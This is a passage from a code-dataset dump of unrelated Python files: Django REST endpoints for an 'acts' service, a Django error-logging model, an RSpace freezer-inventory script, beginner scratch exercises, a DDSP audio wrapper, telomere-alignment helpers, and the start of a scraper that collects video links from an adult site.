status=HTTP_200_OK)\n\n\t\t#to add a category\n\t\telif request.method == 'POST':\n\t\t\tdata = request.data\n\t\t\tprint(\"\\nAddCategory :\", data, \"\\n\")\t\n\t\t\t\n\t\t\ttry:\n\t\t\t\tif len(data[0]) == 0:\n\t\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\t\t\n\t\t\t\tmodels.category.objects.create(categoryName=data[0])\n\t\t\t\treturn Response({}, status=HTTP_201_CREATED)\n\t\t\t\t\n\t\t\texcept Exception as e:\n\t\t\t\t\tprint(\"Exception :\", e)\n\t\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['DELETE'])\ndef RemoveCategory(request, categoryName):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\nRemove category :\", data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tps = models.category.objects.get(pk=categoryName).delete()\n\t\t\treturn Response({}, status=HTTP_200_OK)\n\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef ListActsInCategory(request, categoryName, *args, **kwargs):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tprint(\"\\nListActs :\", request.data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tcategory = models.category.objects.get(pk = categoryName)\n\t\t\tstartRange, endRange = request.GET.get('start'), request.GET.get('end')\n\n\t\t\tif category.categoryCount >= 100:\n\t\t\t\treturn Response({}, status=HTTP_413_REQUEST_ENTITY_TOO_LARGE)\n\t\t\t\n\t\t\tif category.categoryCount == 0 or len(request.data) != 0:\n\t\t\t\treturn Response([], status=HTTP_204_NO_CONTENT)\n\n\t\t\tli = []\n\t\t\tfor i in models.act.objects.filter(categoryName=categoryName).order_by('-timestamp'):\n\t\t\t\tod = dict()\t\n\t\t\t\tod['actId'] = i.actId\n\t\t\t\tod['username'] = i.username\n\t\t\t\tod['timestamp'] = dt_tm(i.timestamp, o2s=True)\n\t\t\t\tod['caption'] = i.caption\n\t\t\t\tod['upvotes'] = i.upvotes\n\t\t\t\tod['imgB64'] = i.imgB64\n\t\t\t\tli.append(od)\n\t\t\t\n\t\t\t#if no range is specified in the url\n\t\t\tif startRange == None or endRange == None:\n\t\t\t\treturn Response(li, status=HTTP_200_OK)\t\t\t\n\t\t\t\n\t\t\t#if range in specified in the url\n\t\t\telse:\n\t\t\t\tif int(endRange) - int(startRange) + 1 > 100:\n\t\t\t\t\treturn Response({}, status=HTTP_413_REQUEST_ENTITY_TOO_LARGE)\n\t\t\t\t\n\t\t\t\tif int(endRange) <= 0 or int(startRange) <= 0 or int(endRange) > category.categoryCount:\n\t\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\n\t\t\t\treturn Response(li[int(startRange):int(endRange)+1], status=HTTP_200_OK)\n\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_204_NO_CONTENT)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef CountActs(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\t#to count number of acts across all categories\n\t\tprint('\\n CountActs', request.data, '\\n')\n\t\tcount_requests[0] += 1\n\n\t\tn = 0\n\t\tfor i in models.category.objects.all():\n\t\t\tn += i.categoryCount\n\n\t\treturn Response([n], status=HTTP_200_OK)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef NumberOfActsInCategory(request, categoryName):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tprint(\"\\n NumberOfActsInCategory :\", request.data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tcategory = models.category.objects.get(pk = categoryName)\n\t\t\treturn Response([category.categoryCount], status=HTTP_200_OK)\n\t\t\n\t\texcept Exception as e:\n\t\t\treturn Response([], status=HTTP_204_NO_CONTENT)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef UpvoteAct(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\n UpvoteAct :\", data, \"\\n\")\t\n\t\t\n\t\tif not isinstance(data[0], int):\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\t\n\t\t\tp = models.act.objects.get(pk = data[0])\n\t\t\tp.upvotes += 1\n\t\t\tp.save()\n\t\t\treturn Response([], status=HTTP_200_OK)\n\t\t\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['DELETE'])\ndef RemoveAct(request, actId):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\nRemoveAct :\", data, \"\\n\")\t\n\t\t\n\t\ttry:\n\t\t\tp = models.act.objects.get(pk = int(actId))\n\t\t\tp.categoryName.categoryCount -= 1\n\t\t\tp.categoryName.save()\n\t\t\tp.delete()\n\t\t\treturn Response({}, status=HTTP_200_OK)\n\t\t\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef UploadAct(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tcount_requests[0] += 1\n\t\tdata = request.data\n\t\tprint(\"\\nUploadActs :\", data, \"\\n\")\t\n\n\t\t#user validation\n\t\ttry:\n\t\t\t#headers = {\"Origin\":\"3.210.166.12\", \"Accept\":\"application/json\"}\n\t\t\theaders = {\"Accept\":\"application/json\"}\n\t\t\t#headers = {}\n\t\t\tusers = requests.get(\"http://100.25.106.87/api/v1/users\",data=\"{}\", headers=headers).text\n\t\t\tprint(\"all users : \" , users)\n\t\texcept requests.exceptions.ConnectionError:\n\t\t\tprint(\"ConnectionError\")\n\t\t\treturn Response({}, status = HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\tif data[\"username\"] not in users:\n\t\t\t\tprint(\"username not found in\", users)\n\t\t\t\treturn Response({}, status = HTTP_400_BAD_REQUEST)\n\t\texcept Exception as e:\t\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\n\t\ttry:\n\t\t\t#base 64 string validation\n\t\t\tif base64.b64encode(base64.b64decode(data['imgB64'])).decode() != data['imgB64']:\n\t\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\t\t\tif not isinstance(data['actId'], int) or 'upvotes' in data:\n\t\t\t\treturn Response({}, status = HTTP_400_BAD_REQUEST)\n\n\t\t\tformatted_timestamp = dt_tm(data['timestamp'], s2o=True)\n\t\t\tcategoryName = models.category.objects.get(pk=data['categoryName'])\n\t\t\tc = models.act.objects.create(actId=int(data['actId']), username=data[\"username\"], timestamp=formatted_timestamp, caption=data['caption'], categoryName=categoryName, imgB64=data['imgB64'])\n\t\t\tc.categoryName.categoryCount += 1\n\t\t\tc.categoryName.save()\n\t\t\treturn Response({}, status=HTTP_201_CREATED)\n\t\t\n\t\texcept Exception as e:\t\n\t\t\tprint(\"Exception :\", e)\n\t\t\treturn Response({}, status=HTTP_400_BAD_REQUEST)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET', 'DELETE'])\ndef count(request):\n\tglobal count_requests, crash_flag\n\tif crash_flag == False:\n\t\tprint(\"\\ncount request received\", request.data, '\\n')\n\n\t\tif request.method == 'GET':\n\t\t\treturn Response(count_requests, status=HTTP_200_OK)\n\n\t\tif request.method == 'DELETE':\n\t\t\tcount_requests = [0]\n\t\t\treturn Response({}, status=HTTP_200_OK)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\ndef health(request):\n\tglobal crash_flag\n\tprint(\"\\nhealth request received\", request.data, \"\\n\")\n\tif (crash_flag == False):\n\t\treturn Response({}, status=HTTP_200_OK)\n\telse:\n\t\treturn Response({}, status=HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['POST'])\ndef crash(request):\n\tglobal crash_flag\n\tprint(\"\\ncrash request received\", request.data, \"\\n\")\n\tcrash_flag = True\n\treturn Response({}, status=HTTP_200_OK)\n\n'''\n{\n\"actId\": 1234,\n\"username\": \"john_doe\",\n\"timestamp\": \"23-12-2323:45-34-22\",\n\"caption\": \"caption text\",\n\"categoryName\": \"cat1\",\n\"imgB64\": \"bGlmZSBpcyBncmVhdA==\"\n}\n'''\n","sub_path":"serverfiles/dockerized_apps/acts/acts/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"389295349","text":"import sys\nimport traceback\nimport json\nimport os\nimport logging\nfrom hashlib import md5\n\nfrom django.utils import timezone\nfrom django.db.models import Model\nfrom django.db import models\nfrom django.http import HttpResponse\nfrom django.core.cache import cache\nfrom django.core.exceptions import MultipleObjectsReturned\nfrom google.appengine.ext import db\n\nfrom .utils import construct_request_json\n\nEVENT_LEVEL_WARNING = \"WARNING\"\nEVENT_LEVEL_INFO = \"INFO\"\nEVENT_LEVEL_ERROR = \"ERROR\"\n\nEVENT_LEVEL_CHOICES = [\n (EVENT_LEVEL_ERROR, \"Error\"),\n (EVENT_LEVEL_WARNING, \"Warning\"),\n (EVENT_LEVEL_INFO, \"Info\")\n]\n\nclass Error(Model):\n exception_class_name = models.CharField(max_length=255)\n summary = models.CharField(max_length=500)\n file_path = models.TextField()\n hashed_file_path = models.CharField(max_length=32)\n\n line_number = models.PositiveIntegerField()\n is_resolved = models.BooleanField()\n event_count = models.PositiveIntegerField(default=0)\n last_event = models.DateTimeField(auto_now_add=True)\n level = models.CharField(max_length=100, choices=EVENT_LEVEL_CHOICES, default=EVENT_LEVEL_ERROR)\n\n class Meta:\n unique_together = [\n ('exception_class_name', 'hashed_file_path', 'line_number')\n ]\n\n @staticmethod\n def hash_for_file_path(file_path):\n return md5(file_path).hexdigest()\n\n def save(self, *args, **kwargs):\n self.hashed_file_path = Error.hash_for_file_path(self.file_path)\n super(Error, self).save(*args, **kwargs)\n\nclass Event(models.Model):\n error = models.ForeignKey(Error, related_name=\"events\")\n created = models.DateTimeField(auto_now_add=True)\n logged_in_user_email = models.EmailField()\n\n request_method = models.CharField(max_length=10)\n request_url = models.TextField()\n request_querystring = models.TextField()\n request_repr = models.TextField()\n request_json = models.TextField()\n\n stack_info_json = models.TextField() #JSON representation of the stack, [{ 'locals' : {}, 'source': '' }]\n\n app_version = models.CharField(max_length=64, default='Unknown')\n\n @property\n def stack_info(self):\n if self.stack_info_json:\n return json.loads(self.stack_info_json)\n else:\n return {}\n\n @property\n def request(self):\n if self.request_json:\n return json.loads(self.request_json)\n else:\n return {}\n\n @classmethod\n def log_event(cls, request, response=None, exception=None):\n from django.views.debug import ExceptionReporter\n\n stack_info = {}\n if exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n summary = \"{0}: {1}\".format(exception.__class__.__name__, unicode(exception))\n lineno = traceback.tb_lineno(exc_traceback)\n\n stack = traceback.extract_tb(exc_traceback)\n unique_path = \"|\".join(line[0] for line in stack)\n path = stack[-1][0]\n\n try:\n reporter = ExceptionReporter(request, is_email=False, *(exc_type, exc_value, exc_traceback))\n django_data = reporter.get_traceback_data()\n\n stack_info[\"frames\"] = django_data.get(\"frames\", [])\n\n #Traceback objects aren't JSON serializable, so delete them\n for frame in stack_info[\"frames\"]:\n if \"tb\" in frame:\n del frame[\"tb\"]\n\n stack_info[\"lastframe\"] = django_data.get(\"lastframe\", {})\n except Exception:\n logging.exception(\"Unable to get html traceback info for some reason\")\n level = EVENT_LEVEL_ERROR\n\n else:\n summary = \"{0} at {1}\".format(response.status_code, request.path)\n lineno = 0\n path = \"?\".join([request.path, request.META.get('QUERY_STRING')])\n unique_path = path\n exception = HttpResponse()\n level = EVENT_LEVEL_WARNING if response.status_code == 404 else EVENT_LEVEL_INFO\n\n exception_name = exception.__class__.__name__\n\n # unique_path is either the full URL or the combined paths from the\n # entire stack trace.\n path_hash = Error.hash_for_file_path(unique_path)\n\n #We try to get from the cache first because on the App Engine datastore\n #we'll get screwed by eventual consistency otherwise\n CACHE_KEY = \"|\".join([exception_name, path_hash, str(lineno)])\n error = cache.get(CACHE_KEY)\n if error:\n created = False\n else:\n try:\n error, created = Error.objects.get_or_create(\n exception_class_name=exception_name,\n hashed_file_path=path_hash,\n line_number=lineno,\n defaults={\n 'file_path': path,\n 'level': level,\n 'summary': summary,\n 'exception_class_name': exception.__class__.__name__ if exception else \"\"\n }\n )\n except MultipleObjectsReturned:\n #FIXME: Temporary hack for App Engine If we created dupes, this de-dupes them\n errors = Error.objects.filter(exception_class_name=exception_name, hashed_file_path=path_hash, line_number=lineno).all()\n\n max_errors = 0\n to_keep = None\n to_remove = []\n for error in errors:\n num_events = error.events.count()\n if max_errors < num_events:\n # Store the error with the most events\n to_keep = error\n max_errors = num_events\n else:\n #this error doesn't have the most events, so mark it for removal\n to_remove.append(error)\n\n assert to_keep\n\n logging.warning(\"Removing {} duplicate errors\".format(len(to_remove)))\n for error in to_remove:\n error.events.all().update(error=to_keep)\n error.delete()\n\n error = to_keep\n\n cache.set(CACHE_KEY, error)\n\n @db.transactional(xg=True)\n def txn(_error):\n _error = Error.objects.get(pk=_error.pk)\n\n event = Event.objects.create(\n error=_error,\n request_repr=repr(request).strip(),\n request_method=request.method,\n request_url=request.build_absolute_uri(),\n request_querystring=request.META['QUERY_STRING'],\n logged_in_user_email=getattr(getattr(request, \"user\", None), \"email\", \"\"),\n stack_info_json=json.dumps(stack_info),\n app_version=os.environ.get('CURRENT_VERSION_ID', 'Unknown'),\n request_json=construct_request_json(request)\n )\n\n _error.last_event = timezone.now()\n _error.event_count += 1\n _error.save()\n return event\n\n return txn(error)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"391342920","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 28 20:04:29 2022\n\n@author: richardadams\n\"\"\"\n\n#%%\nimport sys, time\nimport rspace_client\n\ncli = rspace_client.utils.createInventoryClient()\nfrom rspace_client.inv.inv import (\n GridContainer,\n InventoryClient,\n ByRow,\n ByColumn,\n SamplePost,\n GridContainerPost,\n)\n\n#%%\n\n\nclass FreezerCreator:\n def __init__(\n self,\n cli,\n shelves_per_freezer: int,\n racks_per_shelf: int,\n trays_per_rack: int,\n boxes_per_tray: int,\n ):\n self.shelves_per_freezer = shelves_per_freezer\n self.racks_per_shelf = racks_per_shelf\n self.trays_per_rack = trays_per_rack\n self.boxes_per_tray = boxes_per_tray\n self.cli = cli\n\n def create_freezer(self, name: str):\n print(\"Creating freezer\", file=sys.stderr)\n root = self.create_tier(1, name, self.shelves_per_freezer, 1)[0]\n\n ## shelves\n print(f\"Creating {shelves_per_freezer} shelves\", file=sys.stderr)\n shelves = self.create_tier(\n self.shelves_per_freezer, \"shelf\", self.racks_per_shelf, 1\n )\n self.add_to_parent_tier([root], 1, self.shelves_per_freezer, shelves)\n\n ### racks\n racks_total = racks_per_shelf * shelves_per_freezer\n print(f\"Creating {racks_total} racks\", file=sys.stderr)\n racks = self.create_tier(racks_total, \"rack\", self.trays_per_rack, 1)\n self.add_to_parent_tier(\n shelves, self.shelves_per_freezer, self.racks_per_shelf, racks\n )\n\n ### Trays\n trays_total = racks_total * trays_per_rack\n print(f\"Creating {trays_total} trays\", file=sys.stderr)\n trays = self.create_tier(trays_total, \"tray\", self.boxes_per_tray, 1)\n self.add_to_parent_tier(racks, self.racks_per_shelf, self.trays_per_rack, trays)\n\n ### Boxes\n boxes_total = trays_total * boxes_per_tray\n print(f\"Creating {boxes_total} boxes\", file=sys.stderr)\n boxes = self.create_tier(boxes_total, \"box\", 8, 12, store_samples=True)\n self.add_to_parent_tier(trays, self.trays_per_rack, self.boxes_per_tray, boxes)\n\n return {\n \"freezer\": [root],\n \"shelves\": shelves,\n \"racks\": racks,\n \"trays\": trays,\n \"boxes\": boxes,\n }\n\n def create_tier(self, n, name_prefix, rows, columns, store_samples=False):\n rc = []\n posts = []\n for i in range(0, n, 100):\n for j in range(i, min(n, i + 100) - i):\n c_post = GridContainerPost(\n f\"{name_prefix}-{i}\", rows, columns, can_store_samples=store_samples\n )\n posts.append(c_post)\n\n results = self.cli.bulk_create_container(*posts)\n if not results.is_ok():\n raise Exception(\"creating didn't work\")\n items = [c[\"record\"][\"globalId\"] for c in results.success_results()]\n rc.extend(items)\n\n return rc\n\n def add_to_parent_tier(self, parents, parents_per_gp, items_per_parent, items):\n for j in range(len(parents)):\n k = items_per_parent\n rack_slice = items[j * k : (j * k) + k]\n br = ByRow(1, 1, 1, k, *rack_slice)\n self.cli.add_items_to_grid_container(parents[j], br)\n\n\n#%%\n### Configure the size of the freezer here ( or ask for input)\nprint(\n \"Please enter the number of shelves, racks, trays and boxes to create. Boxes are 12 x 8\"\n)\nshelves_per_freezer = int(input(\"Number of shelves? (1-5)\"))\nracks_per_shelf = int(input(\"Number of racks per shelf? (1-5)\"))\ntrays_per_rack = int(input(\"Number of trays per rack? (1-5)\"))\nboxes_per_tray = int(input(\"Number of boxes per tray? (1-4)\"))\n\nparams = (shelves_per_freezer, racks_per_shelf, trays_per_rack, boxes_per_tray)\nfor i in params:\n if i < 1 or i > 5:\n raise ValueError(f\"Input arguments {params}out of range\")\nbox_cols = 12\nbox_rows = 8\nfreezer_name = (\n f\"-80:{shelves_per_freezer}x{racks_per_shelf}x{trays_per_rack}x{boxes_per_tray}\"\n)\nuser_freezer_name = input(f\"Freezer name? ( default = {freezer_name})\")\nif len(user_freezer_name) > 0:\n freezer_name = user_freezer_name\nprint(\"Creating freezer\", file=sys.stderr)\nfreezerFactory = FreezerCreator(\n cli, shelves_per_freezer, racks_per_shelf, trays_per_rack, boxes_per_tray\n)\nfreezer = freezerFactory.create_freezer(freezer_name)\n\n\n#%%\nsamples_created = 0\ntotal_samples_to_create = len(freezer[\"boxes\"]) * box_cols\nprint(f\"Creating {total_samples_to_create} samples...\", file=sys.stderr)\nfor box in freezer[\"boxes\"]:\n st = time.perf_counter()\n print(f\"Creating samples for {box}\", file=sys.stderr)\n posts = [SamplePost(f\"s{i}\", subsample_count=box_rows) for i in range(box_cols)]\n resp = cli.bulk_create_sample(*posts)\n col = 1\n samples_created = samples_created + box_cols\n print(\n f\" created {box_cols} samples / {total_samples_to_create}\", file=sys.stderr,\n )\n\n ## we can move 12 samples at a time\n ss_ids = []\n for result in resp.data[\"results\"]:\n sample = result[\"record\"]\n s_ids = [ss[\"globalId\"] for ss in sample[\"subSamples\"]]\n ss_ids.extend(s_ids)\n print(f\"moving {box_cols} samples to {box}\", file=sys.stderr)\n gp = ByColumn(col, 1, box_cols, box_rows, *ss_ids)\n cli.add_items_to_grid_container(box, gp)\n stop = time.perf_counter()\n print(f\"Filling {box} took {(stop - st):.2f}s\", file=sys.stderr)\nprint(\"COMPLETED\", file=sys.stderr)\n","sub_path":"examples/freezer.py","file_name":"freezer.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"261299871","text":"'''a=input(\"Enter t-he string\")\r\nb=a.replace(\"plus\",\"+\").replace(\"mul\",\"*\").replace(\"minus\",\"-\").replace(\"div\",\"/\")\r\nprint(eval(b))'''\r\n\r\n'''name=input(\"Enter the String: \")\r\nDOB=input(\"Enter DOB: \")\r\nprint(\"Hiii...{n} {d} {i:.3f} Welcome to BITA\".format(n=name,d=DOB,i=6.66666666))'''\r\n\r\n'''print('/{:<10}/{:^10}/{:>12}'.format(\"welcome\",\"to\",\"BITA\"))'''\r\n\r\n'''a=[]\r\nc=0\r\nfor i in range(1001):\r\n if i%3==0 or i%5==0:\r\n a.append(i)\r\n c+=1\r\nprint(a)\r\nprint(c)\r\nprint(len(a))\r\nprint(max(a))\r\nprint(min(a))'''\r\n\r\n'''v=['a','e','i','o','u']'''\r\n\r\n'''a=[1,[2,3,4],[5,6,7]]\r\nprint(a[1])\r\nprint(a[1][2])'''\r\n\r\n'''a=[[i for i in range(3)]for j in range(3)]\r\nprint(a)'''\r\n\r\n'''a=[i for i in range(1001) if not i%3 or not i%5]\r\nprint(a)'''\r\n\r\n'''a=[1,2,3,4]\r\nb=[1,'jghj',6]\r\na.extend(b)\r\nprint(a)\r\na.append(b)\r\nprint(a)'''\r\n\r\n'''l=[9,6,42,30]\r\nfor i in l:\r\n for j in i:\r\n if i>j==0:\r\n t=i\r\n i=j\r\n j=t\r\n print(t)\r\n\r\n'''\r\n\r\n\r\nc=['Ford','BMW','Volvo']\r\nb=c.sort()\r\nprint(b)\r\n\r\n","sub_path":"replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486235431","text":"import ddsp.training\nimport gin\n\n\nclass DDSPGenerator:\n def __init__(self, checkpoint_path: str, gin_config: str):\n self.model = None\n self.checkpoint_path = checkpoint_path\n self.gin_config = gin_config\n self._load_model()\n\n def _load_model(self):\n gin.parse_config_file(self.gin_config)\n self.model = ddsp.training.models.Autoencoder(encoder=None)\n self.model.restore(self.checkpoint_path)\n\n def predict(self, inputs):\n outputs = self.model(inputs, training=False)\n return self.model.get_audio_from_outputs(outputs)\n","sub_path":"sound_generator/sound_generator/ddsp_generator/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52658735","text":"#!/usr/bin/env python\n#python 3\n#Contact, Adam Taranto, aptaranto@ucdavis.edu\n\n##########################################################################\n# Find soft-clipped alignments containing unassembled telomeric repeats. #\n##########################################################################\n\nimport os\nimport sys\nimport re\n\n__version__ = \"0.0.2\"\n\nclass Error (Exception): pass\n\ndef isfile(path):\n \"\"\"\n Test for existence of input file.\n \"\"\"\n path = os.path.abspath(path)\n if not os.path.isfile(path):\n print(\"Input file not found: %s\" % path)\n sys.exit(1)\n else:\n return path\n\ndef read_fai(fai):\n \"\"\"\n Import fasta index file. Return dict of sequence names and lengths.\n \"\"\"\n path = isfile(fai)\n # Init empty dict\n ContigDict = dict()\n # Read fai_file to dict\n with open(path, \"rU\") as f:\n for line in f.readlines():\n li = line.strip().split()\n ContigDict[li[0]]=int(li[1])\n return ContigDict\n\ndef addRevComplement(motifList):\n \"\"\"\n Take list of DNA motif strings and return unique set of strings and their reverse complements.\n \"\"\"\n revcompl = lambda x: ''.join([{'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N':'N'}[B] for B in x][::-1])\n setList = list()\n for motif in motifList:\n setList.append(motif)\n setList.append(revcompl(motif))\n return set(setList)\n\ndef splitCIGAR(SAM_CIGAR):\n \"\"\"\n Split CIGAR string into list of tuples with format (len,operator)\n \"\"\"\n CIGARlist = list()\n for x in re.findall('[0-9]*[A-Z|=]',SAM_CIGAR):\n CIGARlist.append((int(re.findall('[0-9]*', x)[0]),re.findall('[A-Z]|=', x)[0]))\n #174M76S --> [(174,M),(76,S)]\n #96S154M --> [(96,S),(154,M)]\n return CIGARlist\n\ndef lenCIGAR(SAM_CIGAR):\n \"\"\"\n Calculate length of alignment in reference sequence as sum of \n match, read-deletion, splice, mismatch, and read-match block values.\n Ignore read-insertions, padding, hard and soft clip blocks.\n \"\"\"\n alnLen = 0\n CIGARlist = splitCIGAR(SAM_CIGAR)\n for x in CIGARlist: # i.e. = [(174,M),(76,S)]\n if x[1] in set(['D','M','N','X','=']):\n alnLen += x[0]\n #Ignore operators in set('P','H','S','I')\n return alnLen\n\ndef checkClips(SAM_CIGAR):\n \"\"\"\n Get lengths of soft-clipped blocks from either end of an alignment given a CIGAR string.\n \"\"\"\n leftClipLen = None\n rightClipLen = None\n CIGARlist = splitCIGAR(SAM_CIGAR)\n # Check if first segment is soft-clipped\n if CIGARlist[0][1] == \"S\" :\n leftClipLen = int(CIGARlist[0][0])\n # Check if last segment is soft-clipped\n if CIGARlist[-1][1] == \"S\" :\n rightClipLen = int(CIGARlist[-1][0])\n return (leftClipLen,rightClipLen)\n\ndef isClipMotif(samline,motifList,leftClip,rightClip,leftClipLen,rightClipLen):\n \"\"\"\n Extract terminal soft-clipped blocks from read sequence and test for presence of any DNA motif in motifList.\n \"\"\"\n clipSeq = list()\n SAM_SEQ = 9\n if leftClip:\n clipSeq.append(samline[SAM_SEQ][0:leftClipLen])\n if rightClip:\n clipSeq.append(samline[SAM_SEQ][-rightClipLen:])\n # True if either clipped end sequence contains at least one instance of any motif\n return any(s in x for s in motifList for x in clipSeq)\n\n\"\"\"\nCIGAR Operators\n--------------------\nD Deletion; the nucleotide is present in the reference but not in the read\nH Hard Clipping; the clipped nucleotides are not present in the read.\nI Insertion; the nucleotide is present in the read but not in the rference.\nM Match; can be either an alignment match or mismatch. The nucleotide is present in the reference.\nN Skipped region; a region of nucleotides is not present in the read\nP Padding; padded area in the read and not in the reference\nS Soft Clipping; the clipped nucleotides are present in the read\nX Read Mismatch; the nucleotide is present in the reference\n= Read Match; the nucleotide is present in the reference\n\nThe output order in the array is “MIDNSHP=X” followed by a field for the NM tag. If the NM tag is not present, this field will always be 0.\n\nM BAM_CMATCH 0\nI BAM_CINS 1\nD BAM_CDEL 2\nN BAM_CREF_SKIP 3\nS BAM_CSOFT_CLIP 4\nH BAM_CHARD_CLIP 5\nP BAM_CPAD 6\n= BAM_CEQUAL 7\nX BAM_CDIFF 8\nB BAM_CBACK 9\nNM NM tag 10 \n\"\"\"\n","sub_path":"teloclip/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357276961","text":"import asyncio\nimport csv\nimport os\n\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\nids = None\nwriter = None\nfile_name = 'pornhub_nom_co.csv'\ncsv_header = ['id', 'title', 'time', 'url', 'type']\n\n\nasync def crawl_channels():\n \"\"\"\n 爬取 channel\n \"\"\"\n res = await async_get('http://www.pornhub.nom.co/channels/')\n channels = res.html.xpath(\"//ul[@class='simple-list simple-list--channels']/li/a\")\n results = []\n for channel in channels:\n count = int(channel.xpath(\"*/span[@class='counter']\")[0].text)\n attrs = channel.attrs\n name = attrs.get('title')\n if count != 0:\n url = attrs.get('href')\n fragments = []\n fragments = await crawl_fragments(url, name)\n print('爬取频道 {},应有毛片数量 {},实际数量 {}'.format(name, count, len(fragments)))\n results.extend(fragments)\n else:\n print('频道 {} 没有毛片')\n print('爬取完毕,共爬取到 {} 毛片'.format(len(results)))\n print('开始存入本地文件中')\n for f in results:\n video = await crawl_video(f['url'])\n id = video[0]\n f['id'] = id\n f['url'] = video[1]\n await write_video(f)\n print('写入完毕,文件位置 {}'.format(file_name))\n\n\nasync def write_video(video_info):\n id = video_info['id']\n if id not in ids:\n writer.writerow(f)\n ids.append(id)\n else:\n print('video', id, 'has existed')\n\n\nasync def crawl_fragments(start_url, type):\n \"\"\"\n 爬取 channel 下的毛片。\n 如果有分页,也会一直爬完。\n 使用队列,变递归为非递归\n \"\"\"\n urls = [start_url, ]\n fragments = []\n\n for u in urls:\n res = await async_get(u)\n content = res.html.xpath(\"//main[@class='main-col']/div[@class='main-inner-col inner-col']\")[0]\n items = content.xpath(\n \"*/div[@class='box-container']/div[@class='inner-box-container']/div[@class='row']/div[@class='item-col col']/div[@class='item-inner-col inner-col']/a[1]\")\n for item in items:\n attrs = item.attrs\n title = attrs.get('title')\n time = item.xpath(\"*/span[@class='image']/span[@class='time']\")[0].text\n f_url = attrs.get('href')\n fragments.append({\n 'title': title,\n 'time': time,\n 'url': f_url,\n 'type': type\n })\n # 判断是否还有下一页\n next = content.xpath(\n \"*/nav[@class='pagination-col col pagination']/div[@class='pagination-inner-col inner-col']/a[@class='next']\")\n # 使用url队列,变递归为非递归\n if (len(next) == 1):\n urls.append(*next[0].absolute_links)\n return fragments\n\n\nasync def crawl_video(url):\n \"\"\"\n 爬取 video 的真正地址,分为两步\n 第一步,进入到上面的播放页面,由于播放器是使用的 iframe 嵌套,仍需找到真正的播放页面\n 第二步,进入真正播放器的页面,找打video地址\n \"\"\"\n res = await async_get(url)\n iframe_url = res.html.xpath(\"//iframe/@src\")[0]\n id = iframe_url[iframe_url.rfind('/') + 1:]\n res = await async_get(iframe_url)\n video_url = res.html.xpath(\"//video/source[@res='480']/@src\")[0]\n return (id, video_url)\n\n\nasync def async_get(url):\n \"\"\"\n 将 get 